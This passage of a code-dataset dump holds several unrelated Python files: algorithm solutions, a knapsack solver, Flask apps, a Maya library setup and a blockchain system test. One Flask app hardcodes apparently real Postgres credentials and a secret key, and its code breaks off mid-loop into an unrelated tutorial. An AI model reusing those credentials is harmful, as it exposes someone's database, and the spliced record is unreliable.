}\n\n export = __snapshot__\n","sub_path":"nbdler/manager/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":10755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"123214966","text":"import random\nimport math\nimport sys\nrandom.seed(666)\n\n\nclass Solution():\n def findMedianSortedArrays(self, nums1: list, nums2: list):\n '''\n Approach 1: the key is to find the partition point of each list such that the partition yields the median; binary search is needed to locate this partition point\n Approach 2: find the k-th element, using the sortedness of the data to repeatedly shrink the problem size\n Approach 3: take each array's median and discard the non-qualifying part, iterating (this only works for two sequences of equal length)\n '''\n # Approach 1\n if len(nums1) < len(nums2):\n nums1, nums2 = nums2, nums1\n if len(nums2) == 0:\n return nums1[len(nums1)//2] if len(nums1) % 2 else (nums1[len(nums1)//2]+nums1[len(nums1)//2-1])/2\n left_bound = (len(nums1)-len(nums2))//2\n right_bound = (len(nums1)+len(nums2))//2\n while left_bound <= right_bound:\n mid_1 = (left_bound+right_bound)//2\n mid_2 = (len(nums1)+len(nums2))//2-mid_1\n if mid_1 > 0 and mid_2 < len(nums2) and nums1[mid_1-1] > nums2[mid_2]:\n right_bound = mid_1-1\n elif mid_1 < len(nums1) and mid_2 > 0 and nums1[mid_1] < nums2[mid_2-1]:\n left_bound = mid_1+1\n else:\n if mid_1 < len(nums1) and mid_2 < len(nums2):\n right_min = min(nums1[mid_1], nums2[mid_2])\n else:\n right_min = nums1[mid_1] if mid_1 < len(nums1) else 
nums2[mid_2]\n if (len(nums1)+len(nums2)) % 2:\n return right_min\n if mid_1 > 0 and mid_2 > 0:\n left_max = max(nums1[mid_1-1], nums2[mid_2-1])\n else:\n left_max = nums1[mid_1-1] if mid_1 > 0 else nums2[mid_2-1]\n return (left_max+right_min)/2\n\n def sortArray(self, nums: list):\n # insertion sort with a stack; times out\n '''\n if not len(nums):\n return nums\n temp = nums.pop()\n sortarray = []\n while len(nums) or (len(sortarray) and sortarray[-1] > temp): # implement insertion sort's shifting with a stack; the key is that the last element must be >= the top of the sorted stack\n if len(sortarray) == 0 or temp >= sortarray[-1]:\n sortarray.append(temp)\n temp = nums.pop()\n else:\n nums.append(sortarray.pop())\n sortarray.append(temp)\n return sortarray\n '''\n ''' \n # Quicksort v1: partition from both ends toward the middle\n # Since the two ends alternate, each round can inspect both ends, using while loops nested in a while loop\n def temp_sort(left, right): # be clear about what left and right stand for\n if left == right:\n return\n refer = nums[left]\n left_pos, right_pos = left, right-1\n while left_pos < right_pos: # three loops implement the alternating left-right-left-right sweeps\n while left_pos < right_pos and nums[right_pos] >= refer:\n right_pos -= 1\n nums[left_pos] = nums[right_pos]\n while left_pos < right_pos and nums[left_pos] < refer:\n left_pos += 1\n nums[right_pos] = nums[left_pos]\n midindex = left_pos\n nums[midindex] = refer # finally put back the pivot (refer) that was taken out\n temp_sort(left, midindex)\n temp_sort(midindex+1, right) # note that the pivot's position is already fixed\n temp_sort(0, len(nums))\n return(nums)\n '''\n # Quicksort v1: simplified version\n def temp_sort(left, right): # here left and right form a closed interval\n if left >= right:\n return\n refer = nums[left] # pick a pivot value\n left_pos, right_pos = left, right # define the traversal start points\n while left_pos < right_pos: # three loops implement the alternating left-right-left-right sweeps\n while nums[right_pos] >= refer and left_pos < right_pos:\n right_pos -= 1\n nums[left_pos] = nums[right_pos]\n while nums[left_pos] <= refer and left_pos < right_pos:\n left_pos += 1\n nums[right_pos] = nums[left_pos]\n nums[left_pos] = refer\n temp_sort(left, left_pos-1)\n temp_sort(right_pos+1, right) # note that the pivot's position is already fixed\n temp_sort(0, len(nums)-1)\n return(nums)\n '''\n # Quicksort v2: the key is to split the array into three segments, where [left+1,mid) is the less-than part, [mid,k) the greater-than part, and [k,right) the unvisited part\n def temp_sort(left, right):\n if right-left == 0:\n return\n refer = nums[left]\n midindex = left+1\n for k in range(left+1, right):\n if nums[k] < refer: # roll the greater-than segment forward\n nums[k], nums[midindex] = nums[midindex], nums[k]\n midindex += 1\n nums[left], nums[midindex-1] = nums[midindex-1], nums[left] # finally move the pivot to its proper position\n temp_sort(left, midindex-1) # note that the pivot is already in place\n temp_sort(midindex, right)\n temp_sort(0, len(nums))\n return(nums)\n '''\n '''\n # Heapsort; note that sorting ascending requires building a max-heap\n def down_filter(temp_index, heap_lenght): # the heap size must be fixed while building the heap\n left_c = temp_index*2+1\n right_c = temp_index*2+2\n if left_c >= heap_lenght and right_c >= heap_lenght:\n return\n else:\n if right_c >= heap_lenght:\n choose = left_c\n else:\n choose = left_c if nums[left_c] > nums[right_c] else right_c\n if nums[choose] > nums[temp_index]:\n nums[choose], nums[temp_index] = nums[temp_index], nums[choose]\n down_filter(choose, heap_lenght) # recurse\n for k in range(len(nums)-1, -1, -1): # building the heap bottom-up is faster\n down_filter(k, len(nums))\n for k in range(len(nums)-1, -1, -1):\n nums[0], nums[k] = nums[k], nums[0]\n down_filter(0, k)\n return(nums)\n '''\n\n def trap(self, height):\n # Trapping rain water: the key is to treat the water as two kinds, water held against the right wall and water held against the left wall\n if len(height) == 0:\n return 0\n result = 0\n refer_left = height[0]\n temp_result = 0\n for index in range(1, len(height)):\n if height[index] <= refer_left:\n temp_result += (refer_left-height[index])\n else:\n refer_left = height[index]\n result += temp_result\n temp_result = 0\n temp_result = 0\n refer_right = height[len(height)-1]\n for index in range(len(height)-2, -1, -1):\n if height[index] < refer_right:\n temp_result += (refer_right-height[index])\n else:\n refer_right = height[index]\n result += temp_result\n temp_result = 0\n return result\n\n def maximumGap(self, nums):\n # Maximum gap in the array, computed quickly by splitting the elements into buckets\n if len(nums) < 2:\n return 0\n max_num, min_num = max(nums), min(nums)\n box_size = max((max_num-min_num)//(len(nums)-1), 1) # choose the box size so that n boxes cover the value range and the last bucket always contains the last element, guarding against a size of 0\n box_num = (max_num-min_num)//box_size+1 # the number of buckets can exceed n in this case\n box_list = [[] for _ in range(box_num)]\n for num in nums:\n box_index = (num-min_num)//box_size\n box_list[box_index].append(num)\n new_list = [box for box in box_list if box] # drop empty buckets\n result = 0\n for box_index in range(1, len(new_list)):\n result = max(result, min(new_list[box_index])-max(new_list[box_index-1])) # by the pigeonhole principle the gap between two boxes is larger than any gap inside a box\n return result\n\n def searchRange(self, nums, target):\n # Locate the boundaries of a given element in a sorted array, using binary search\n # First pin down the problem: find the smallest index greater than the target and the largest index smaller than the target; note that searching directly for the equality boundary is hard to define\n # Once defined, handle the boundary conditions\n nums = [-sys.maxsize-1]+nums+[sys.maxsize]\n\n def find_right(left, right): # return the smallest index in the range whose value is greater than target\n if left == right:\n return left\n mid = (left+right)//2\n if nums[mid] <= target:\n return find_right(mid+1, right)\n else:\n return find_right(left, mid)\n\n def find_left(left, right):\n if left == right:\n return left\n mid = (left+right+1)//2 # note: round up here\n if nums[mid] >= target:\n return find_left(left, mid-1)\n else:\n return find_left(mid, right)\n\n right_index = find_right(0, len(nums)-1)\n left_index = find_left(0, len(nums)-1)\n return [left_index, right_index-2] if right_index-left_index > 1 else [-1, -1]\n\n\nif __name__ == '__main__':\n solu = Solution()\n # result = solu.sortArray([5, 2, 3, 1])\n # result = solu.trap([0, 1, 0, 2, 1, 0, 1, 3, 2, 1, 2, 1])\n # result = solu.maximumGap([1, 1, 1, 1])\n result = solu.searchRange([5, 7, 7, 8, 8, 10], 8)\n pass\n","sub_path":"Origin/Leetcode/Solution/array.py","file_name":"array.py","file_ext":"py","file_size_in_byte":9732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"653179475","text":"from fractions import Fraction\nimport numpy as np \nfrom ortools.linear_solver import pywraplp\n\ndef read_data(path):\n with open(path) as f:\n N, M = list(map(int, f.readline().split()))\n C = list(map(Fraction, f.readline().split()))\n A = []\n b = []\n for _ in range(M):\n line = list(map(Fraction, f.readline().split()))\n A.append(line[:-1])\n b.append(line[-1])\n return A, b, C\n\ndef knapsack(values, weights, capacity ):\n solver = pywraplp.Solver('knapshack_model', pywraplp.Solver.CBC_MIXED_INTEGER_PROGRAMMING)\n n = len(values)\n x = np.empty(n, dtype = object)\n\n for i in range(n):\n x[i] = solver.BoolVar('x%i' %i)\n bag = solver.Constraint(0, float(capacity))\n for i in range(n):\n bag.SetCoefficient(x[i], float(weights[i]))\n\n obj = solver.Objective()\n for i in range(n):\n obj.SetCoefficient(x[i], float(values[i]))\n obj.SetMaximization()\n\n status = solver.Solve()\n\n if not status == pywraplp.Solver.OPTIMAL:\n return None\n \n x_vals = [False]*n\n for i in range(n):\n x_vals[i] = False if int(x[i].solution_value()) == 0 else True\n return obj.value() , x_vals\n\n \n ","sub_path":"Gomory_cut_edition1.0/knapsackMIP.py","file_name":"knapsackMIP.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"19913659","text":"import os\nimport base64\nimport sqlite3\nfrom flask import Flask, request, 
session, g, redirect, url_for, abort, \\\n render_template, flash\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\napp.config.update(dict(\n DATABASE= os.path.join(app.root_path, 'linku.db'),\n SECRET_KEY= 'development key',\n USERNAME= 'admin',\n PASSWORD= 'admindefault'\n ))\napp.config.from_envvar('LINKU_SETTINGS', silent=True)\n\ndef connect_db():\n '''Connects to db'''\n rv = sqlite3.connect(app.config['DATABASE'])\n rv.row_factory = sqlite3.Row\n return rv\n\ndef get_db():\n '''Opens new db connection if none exist yet.'''\n if not hasattr(g, 'sqlite_db'):\n g.sqlite_db = connect_db()\n return g.sqlite_db\n\n@app.teardown_appcontext\ndef close_db(error):\n '''closes db at the end of request.'''\n if hasattr(g, 'sqlite_db'):\n g.sqlite_db.close()\n\ndef init_db():\n db = get_db()\n with app.open_resource('schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n@app.cli.command('initdb')\ndef initdb_command():\n '''Initialize db.'''\n init_db()\n print('Initialized the database.')\n\n@app.route('/')\ndef index():\n db = get_db()\n cur = db.execute('select id, link from links order by id asc')\n link_entries = cur.fetchall()\n return render_template('index.html', link_entries=link_entries)\n\n@app.route('/add', methods=['POST'])\ndef add_link():\n db = get_db()\n cur = db.execute('insert into links (link) values (?)',[request.form['link']])\n db.commit()\n db_id = cur.lastrowid\n \n shorted_url = encodes(db_id).decode()\n domain = url_for('index', _external=True)\n link = domain + '{}'.format(shorted_url)\n\n flash('link added. visit at {}'.format(link))\n return redirect(url_for('index'))\n\n@app.route('/<link_byte>')\ndef gotolink(link_byte):\n db=get_db()\n link_id = decodes(link_byte)\n cur = db.execute('select link from links where id=?', (link_id,))\n link = cur.fetchone()\n if link:\n return redirect('http://' + link[0], code=302)\n else:\n abort(404)\n\ndef encodes(i):\n s = str(i).encode()\n return base64.urlsafe_b64encode(s)\n\ndef decodes(s):\n ss= s.encode()\n i = base64.urlsafe_b64decode(ss)\n return int(i.decode())\n","sub_path":"linku/linku.py","file_name":"linku.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"322913695","text":"import os\nfrom yolo_video import start\nfrom flask import Flask, flash, request, redirect, url_for, render_template, session, g, Markup\nfrom werkzeug.utils import secure_filename\nfrom utils import detect_image\nimport base64\nimport cv2\nimport numpy as np\nimport keras.backend as K\nimport random\nimport string\nimport psycopg2\nimport babel.dates\n\napp = Flask(__name__,static_url_path=('/static'))\napp.config['SQLAlCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLAlCHEMY_DATABASE_URI'] = 'postgres://jlbzqjdoaixcjn:550ecbc824bc536e282ef94ed45d3a61e1a8ac0f1ae6b99b8822ba28451006ec@ec2-54-197-34-207.compute-1.amazonaws.com:5432/d2ce06aa7se8s1'\napp.config['SECRET_KEY'] = '550ecbc824bc536e282ef94ed45d3a61e1a8ac0f1ae6b99b8822ba284515140'\napp.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\napp.config['SQLALCHEMY_ECHO']=True\n\n\n'''\nclass admin_data(db.Model):\n username = db.Column(db.String(20),primary_key = True)\n password = db.Column(db.String(200),unique=False,primary_key = False)\n name = db.Column(db.String(100),unique=False,primary_key = False)\n email = db.Column(db.String(100),unique=False,primary_key = False)\n mobile = db.Column(db.String(20),unique=False,primary_key = False)\n modify_date = db.Column(db.DateTime,unique=False,primary_key = False)\n def __repr__(self):\n return '' % self.username\nquery = admin_data.query.filter_by(username=\"admin_t\").first()\nprint(\"\\n\\n\\n\\n\\n\\n\\n Hello\",query.username,\"\\n\\n\\n\\n\\n\\n\\n\")\n'''\n\ndef randomString(stringLength=10):\n \"\"\"Generate a random string of fixed length\"\"\"\n letters = string.ascii_lowercase\n return ''.join(random.choice(letters) for i in range(stringLength))\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\n\nconn = psycopg2.connect(host='ec2-54-197-34-207.compute-1.amazonaws.com',user='jlbzqjdoaixcjn',password='550ecbc824bc536e282ef94ed45d3a61e1a8ac0f1ae6b99b8822ba28451006ec',database='d2ce06aa7se8s1')\nUPLOAD_FOLDER = '/app/static/inputdata/'\napp.secret_key= os.urandom(24)\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nprint(\"\\n\\n\\n\\n\\n\\n\\n\\n\",os.path.join(os.path.abspath(os.getcwd()), '/static/inputdata/'))\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS\n \ndef format_datetime(value, format='medium'):\n if format == 'full':\n format=\"EEEE, d. MMMM y 'at' HH:mm\"\n elif format == 'medium':\n format=\"EE dd.MM.y HH:mm\"\n return babel.dates.format_datetime(value, format)\napp.jinja_env.filters['datetime'] = format_datetime\n\n@app.route('/')\ndef init():\n with conn: \n cur = conn.cursor()\n try:\n cur.execute(\"select info_desc from process where info_num = 1\")\n text = cur.fetchall()\n cur.execute(\"select * from news order by id desc\")\n news = cur.fetchall()\n except psycopg2.Error as e:\n print(e) \n cur.close()\n i=0\n news_title=[]\n news_desc=[]\n news_subtitle=[]\n news_img_list=[]\n news_index=[]\n while i < len(news):\n news_img_list.append(news[i][4].split(\",\"))\n news_desc.append(Markup(news[i][3]))\n news_subtitle.append(Markup(news[i][2]))\n news_title.append(Markup(news[i][1]))\n news_index.append(Markup(news[i][0]))\n i+=1\n \n return render_template('index.html',news_index=news_index, text = Markup(text[0][0]),news_title=news_title,news_subtitle=news_subtitle,news_desc=news_desc,news_img=news_img_list)\n \n@app.route('/gesture')\ndef phra():\n with conn:\n cur = conn.cursor()\n query = \"select * from description\"\n cur.execute(query)\n gesture = cur.fetchall()\n cur.close()\n model = []\n i=0\n while i )\n\n#print dictionaries\nfor (animal, number) in legs.items():\n print(\"{} has {} legs\".format(animal, number))\n\n#add element to dic dic[\"key\"] = value\nlegs[\"spider\"] = 65\nprint(legs)\n\n#modify a value in dic\nlegs[\"spider\"] = 8\n\n#the key can't be modified\n\n#the del statement works the same as lists with dictionaries\n\n#get the value of a key\nprint(legs[\"ant\"]) #if the key doesn't exist it gives error\n\n#to avoid the error use the method dic.get(\"key\") or dic.get(\"key\", \"a value to be used in case the key doesn't exist\")\nlegs.get(\"legs\", \"Not present\")\n\n#clear all elements\nlegs.clear() # works the same with lists\n\n","sub_path":"list_dict.py","file_name":"list_dict.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
{"seq_id":"470485872","text":"# -*- coding: utf-8 -*-\nfrom PIL import Image\n\n__author__ = 'song'\n\n\ndef func1():\n im = Image.open('test.jpg')\n print(im.format, im.size, im.mode)\n im.thumbnail((200, 100))\n im.save('thumb.png', 'PNG')\n\n\nif __name__ == '__main__':\n 
func1()\n","sub_path":"other/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"103499350","text":"import json\nimport os\nimport sgtk\nfrom maya import cmds\n\nAPP = sgtk.platform.current_engine()\nPROJECT_PATH = APP.tank.project_path\nTK = sgtk.sgtk_from_path(PROJECT_PATH)\nCTX = TK.context_from_path(PROJECT_PATH)\nCONFIG = APP.context.tank.pipeline_configuration\n\nclass zombieSettings:\n def __init__(self):\n self.project_library = os.path.join(PROJECT_PATH, self.getPipe(), 'data', 'StudioLibrary')\n self.types = []\n self.projectId = CTX.project['id']\n\n self.createDataBase()\n self.setPathSettings()\n\n self.assets = APP.shotgun.find('Asset', [['project.Project.id', 'is', self.projectId]], ['code', 'sg_asset_type'])\n self.sequence = APP.shotgun.find('Sequence', [['project.Project.id', 'is', self.projectId]], ['code'])\n self.shots = APP.shotgun.find('Shot', [['project.Project.id', 'is', self.projectId]], ['code', 'sg_sequence'])\n\n self.getTypes()\n self.createAssets()\n self.createShots()\n\n def getTypes(self):\n for asset in self.assets:\n self.types.append(asset['sg_asset_type'])\n self.types = list(dict.fromkeys(self.types))\n\n def createAssets(self):\n if not os.path.exists(os.path.join(self.project_library, 'Assets')):\n os.mkdir(os.path.join(self.project_library, 'Assets'))\n\n for type in self.types:\n if not os.path.exists(os.path.join(self.project_library, 'Assets', type)):\n os.mkdir(os.path.join(self.project_library, 'Assets', type))\n\n for asset in self.assets:\n if asset['sg_asset_type'] == type:\n if not os.path.exists(os.path.join(self.project_library, 'Assets', type, asset['code'])):\n os.mkdir(os.path.join(self.project_library, 'Assets', type, asset['code']))\n\n def createShots(self):\n if not os.path.exists(os.path.join(self.project_library, 'Shots')):\n os.mkdir(os.path.join(self.project_library, 'Shots'))\n\n for seq in self.sequence:\n if not os.path.exists(os.path.join(self.project_library, 'Shots', seq['code'])):\n os.mkdir(os.path.join(self.project_library, 'Shots', seq['code']))\n\n for shot in self.shots:\n if seq['code'] == shot['sg_sequence']['name']:\n if not os.path.exists(os.path.join(self.project_library, 'Shots', seq['code'], shot['code'])):\n os.mkdir(os.path.join(self.project_library, 'Shots', seq['code'], shot['code']))\n\n def createDataBase(self):\n if not os.path.exists(self.project_library):\n os.makedirs(self.project_library)\n os.mkdir('{}\\\\.studiolibrary'.format(self.project_library))\n databse = '{}\\\\.studiolibrary\\\\database.json'.format(self.project_library)\n with open(databse, 'w') as outfile:\n json.dump({}, outfile)\n\n def setPathSettings(self):\n pathStudiLibrarySettings = os.path.join(os.environ['appdata'], 'StudioLibrary', 'LibraryWidget.json')\n with open(pathStudiLibrarySettings) as data:\n settings = json.load(data)\n settings['Default']['path'] = self.project_library\n with open(pathStudiLibrarySettings, 'w') as outSettings:\n json.dump(settings, outSettings)\n\n def getPipe(self):\n if 'Anim' not in CONFIG.get_name():\n return '02_prod'\n else:\n return '06_prod_anim'\n","sub_path":"Zombie/zsPanel/animation/studiolibrary/zombie.py","file_name":"zombie.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"595646018","text":"import logging\nimport os\n\nfrom subprocess import Popen, PIPE, 
STDOUT\nfrom time import sleep\n\nimport yaml\n\nfrom mainnet.builder import import_keys, WALLET_PASSWORD\nfrom mainnet.env import und, undcli, rpc_endpoint, undcli_home\nfrom mainnet.systemtest.models import (\n Registration, HashSubmission, BeaconSubmission, BeaconRegistration)\nfrom mainnet.systemtest.generator import (\n generate_dataset, generate_beacon_dataset)\n\nlog = logging.getLogger(__name__)\n\nUND = und()\nUNDCLI = undcli()\n\nCHAINID = 'UND-Mainchain-DevNet'\n\n\ndef undcli_query(params, sign=False):\n node = rpc_endpoint()\n\n cmd = [UNDCLI] + params + ['--chain-id', CHAINID, '--node', node]\n\n if sign:\n cmd = cmd + ['--from', 'node1', '--yes', '--broadcast-mode=block',\n '--home', undcli_home(), '--keyring-backend', 'test']\n cmd = list(map(str, cmd))\n log.debug(' '.join(cmd))\n p = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n stdout, stderr = p.communicate(input=WALLET_PASSWORD)\n else:\n log.debug(' '.join(cmd))\n cmd = list(map(str, cmd))\n p = Popen(cmd, stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n stdout, stderr = p.communicate()\n\n decoded = stdout.decode('utf-8')\n error = decoded.split('\\n')[0] == 'ERROR: ERROR:'\n if error:\n log.warning(decoded)\n return None\n try:\n d = yaml.safe_load(decoded)\n except Exception as e:\n return None\n return d\n\n\ndef register_wrkchain(registration: Registration):\n log.info(f'Registering WRKChain: {registration.FriendlyName}')\n d = undcli_query(\n ['tx', 'wrkchain', 'register',\n f'--moniker={registration.WrkChainID}',\n f'--genesis={registration.GenesisHash}',\n f'--name={registration.FriendlyName}',\n f'--base=geth'], sign=True)\n if d is None:\n return None\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error registering: {d[\"rawlog\"]}')\n return None\n\n\ndef register_beacon(registration: BeaconRegistration):\n log.info(f'Registering Beacon: {registration.FriendlyName}')\n d = undcli_query(\n ['tx', 'beacon', 'register',\n f'--moniker={registration.BeaconID}',\n f'--name={registration.FriendlyName}'], sign=True)\n print(d)\n if d is None:\n return None\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error registering: {d[\"rawlog\"]}')\n return None\n\n\ndef submithash(submission: HashSubmission):\n log.info(f'Submitting hash: {submission.BlockHash}')\n d = undcli_query(\n ['tx', 'wrkchain', 'record',\n submission.WrkChainID,\n f'--wc_height={submission.Height}',\n f'--block_hash={submission.BlockHash}',\n f'--parent_hash={submission.ParentHash}',\n f'--hash1={submission.Hash1}',\n f'--hash2={submission.Hash2}',\n f'--hash3={submission.Hash3}'], sign=True)\n if d is None:\n return None\n\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error submitting hash: {d[\"rawlog\"]}')\n return None\n\n\ndef submit_beacon_hash(submission: BeaconSubmission):\n log.info(f'Submitting hash: {submission}')\n d = undcli_query(\n ['tx', 'beacon', 'record',\n submission.BeaconChainID,\n f'--hash={submission.Hash}',\n f'--subtime={submission.Subtime}'], sign=True)\n if d is None:\n return None\n\n if d['codespace'] == \"\":\n return d['txhash']\n else:\n log.warning(f'Error submitting hash: {d[\"rawlog\"]}')\n return None\n\n\ndef query_wrkchain_meta(wrkchain_id):\n d = undcli_query(['query', 'wrkchain', 'wrkchain', str(wrkchain_id)])\n return d\n\n\ndef query(wrkchain_id):\n log.info(f'Query blocks for WRKChain {wrkchain_id}')\n meta_data = query_wrkchain_meta(wrkchain_id)\n if meta_data is None:\n return None\n\n for i in 
range(meta_data['lastblock']):\n height = i + 1\n d = undcli_query(['query', 'wrkchain', 'block', str(wrkchain_id),\n str(height)])\n\n if isinstance(d, dict):\n log.info(f'found hash for wrkchain: {d[\"wrkchainid\"]} '\n f'for wrkchain height {d[\"height\"]}')\n submission = HashSubmission(\n int(d['wrkchainid']), int(d['height']), d['blockhash'],\n d['parenthash'], d['hash1'], d['hash2'], d['hash3'])\n yield submission\n\n\ndef query_beacon_submissions(beacon_id):\n d = undcli_query(['query', 'beacon', 'beacon', str(beacon_id)])\n if d is None:\n return None\n\n for i in range(d['lasttimestampid']):\n d = undcli_query(\n ['query', 'beacon', 'timestamp', str(beacon_id), str(i + 1)])\n yield BeaconSubmission(d['beaconid'], d['hash'], d['submittime'])\n\n\ndef validate_hash(txhash):\n d = undcli_query(['query', 'tx', txhash])\n if d is None:\n log.warning(f'Something went wrong validating hash')\n return None\n\n if d['codespace'] == \"\":\n log.info(f'Transaction {txhash} is valid')\n return d\n else:\n log.warning(f'Transaction {txhash} is invalid')\n log.info(d['rawlog'])\n return d\n\n\ndef compare_attribute(base, target, attr):\n a = getattr(base, attr)\n b = getattr(target, attr)\n log.info(f'Comparing {attr} {a} with {b}')\n if a != b:\n raise Exception('Mismatched data')\n\n\ndef compare_submissions(base: [HashSubmission], target: [HashSubmission]):\n if len(base) != len(target):\n raise Exception('Mismatched number of submissions')\n for i in range(len(base)):\n a = base[i]\n b = target[i]\n log.info(\n f'Comparing WRKChain {a.WrkChainID} at height {a.Height} with '\n f'WRKChain {b.WrkChainID} at height {b.Height}')\n for attr in ['BlockHash', 'ParentHash', 'Hash1', 'Hash2', 'Hash3']:\n compare_attribute(a, b, attr)\n\n\ndef compare_beacon_submissions(\n base: [BeaconSubmission], target: [BeaconSubmission]):\n if len(base) != len(target):\n raise Exception('Mismatched number of submissions')\n for i in range(len(base)):\n a = base[i]\n b = target[i]\n log.info(\n f'Comparing Beacon {a.BeaconChainID} at height {a.Subtime} with '\n f'Beacon {b.BeaconChainID} at height {b.Subtime}')\n for attr in ['Hash']:\n compare_attribute(a, b, attr)\n\n\ndef sleep_forever():\n log.info(\"Sleeping forever\")\n sleep(60 * 60 * 24)\n\n\ndef main():\n logging.basicConfig(level=os.environ.get(\"LOGLEVEL\", \"DEBUG\"))\n\n wrkchain_datasets = generate_dataset()\n beacon_datasets = generate_beacon_dataset()\n\n import_keys(keys_dir='/root/.go/src/github.com/unification-com/mainchain/'\n 'Docker/assets/keys', backend='test')\n sleep(5)\n hashes = []\n\n for beacon_dataset in beacon_datasets:\n registration_hash = register_beacon(beacon_dataset.BeaconRegistration)\n hashes.append(registration_hash)\n\n for dataset in wrkchain_datasets:\n registration_hash = register_wrkchain(dataset.Registration)\n hashes.append(registration_hash)\n\n for beacon_dataset in beacon_datasets:\n for submission in beacon_dataset.BeaconSubmissions:\n hashes.append(submit_beacon_hash(submission))\n\n for dataset in wrkchain_datasets:\n for submission in dataset.Submissions:\n hashes.append(submithash(submission))\n\n for dataset in wrkchain_datasets:\n results = list(query(int(dataset.Registration.WrkChainID)))\n target = sorted(results, key=lambda x: int(x.Height))\n base = sorted(dataset.Submissions, key=lambda x: int(x.Height))\n compare_submissions(base, target)\n\n for dataset in beacon_datasets:\n results = list(\n query_beacon_submissions(dataset.BeaconRegistration.BeaconID))\n target = sorted(results, key=lambda x: 
int(x.Subtime))\n base = sorted(dataset.BeaconSubmissions, key=lambda x: int(x.Subtime))\n compare_beacon_submissions(base, target)\n\n sleep(5)\n\n for txhash in hashes:\n if txhash is not None:\n validate_hash(txhash)\n\n sleep(120)\n log.info(\"Checking that restored data exists\")\n\n for dataset in beacon_datasets:\n results = list(\n query_beacon_submissions(dataset.BeaconRegistration.BeaconID))\n target = sorted(results, key=lambda x: int(x.Subtime))\n base = sorted(dataset.BeaconSubmissions, key=lambda x: int(x.Subtime))\n compare_beacon_submissions(base, target)\n\n for dataset in wrkchain_datasets:\n results = list(query(int(dataset.Registration.WrkChainID)))\n target = sorted(results, key=lambda x: x.Height)\n base = sorted(dataset.Submissions, key=lambda x: x.Height)\n compare_submissions(base, target)\n\n sleep_forever()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/mainnet/systemtest/wrkchain.py","file_name":"wrkchain.py","file_ext":"py","file_size_in_byte":8928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157810364","text":"\"\"\"\nCreate users table\n\nRevision ID: 2a55de3a35ee\nRevises: 40aa1a9694cf\nCreate Date: 2017-02-28 08:19:35.762706\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '2a55de3a35ee'\ndown_revision = '40aa1a9694cf'\n\nfrom alembic import op\nfrom sqlalchemy import Column, Integer, Unicode, PrimaryKeyConstraint\nfrom sqlalchemy.dialects.postgresql import JSONB\n\n\ndef upgrade():\n op.create_table('users',\n Column('id', Integer(), nullable=False),\n Column('first_name', Unicode()),\n Column('last_name', Unicode()),\n Column('data', JSONB()),\n PrimaryKeyConstraint('id')\n )\n\n\ndef downgrade():\n op.drop_table('users')\n","sub_path":"migrations/versions/2a55de3a35ee_user.py","file_name":"2a55de3a35ee_user.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"335834936","text":"\n# SPDX-License-Identifier: MIT\n# Copyright (c) 2016-2020 Michael Purcaro, Henry Pratt, Jill Moore, Zhiping Weng\n\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport glob\n\nsys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../../../metadata/utils\"))\nfrom exp import Exp\nfrom exp_file import ExpFile\n\n\nclass CreateHg38:\n LISTFILES = [\"dnase-list.txt\", \"h3k4me3-list.txt\", \"h3k27ac-list.txt\", \"ctcf-list.txt\"]\n\n @staticmethod\n def _process(exp, tassembly=\"GRCh38\"):\n allsignal = glob.glob(\"/data/projects/encode/data/%s/*.bigWig\" % exp.encodeID)\n signal = {}\n for signalfile in allsignal:\n f = ExpFile.fromJsonFile(exp.encodeID, os.path.basename(signalfile).split(\".\")[0], True)\n if f.assembly == tassembly:\n signal[f.biological_replicates[0]] = f\n peaks = {x.biological_replicates[0]: x for x in filter(lambda x: x.assembly == tassembly and x.file_type == \"bed broadPeak\", exp.files)}\n return (peaks, signal)\n\n @staticmethod\n def _writehotspots(filemap, path):\n with open(path, \"wb\") as o:\n for k, v in filemap.iteritems():\n ct, acc = k\n for peaks, signal in v:\n o.write(\"%s\\t%s\\t%s\\t%s\\t%s\\n\" % (acc, peaks, acc, signal, ct))\n\n @staticmethod\n def _writelist(filemap, path):\n with open(path, \"wb\") as o:\n for k, v in filemap.iteritems():\n ct, acc = k\n peaks, signal = v\n o.write(\"%s\\t%s\\t%s\\n\" % (acc, signal, ct))\n\n def __init__(self, rootdir):\n self.filemap = {}\n for k in CreateHg38.LISTFILES:\n 
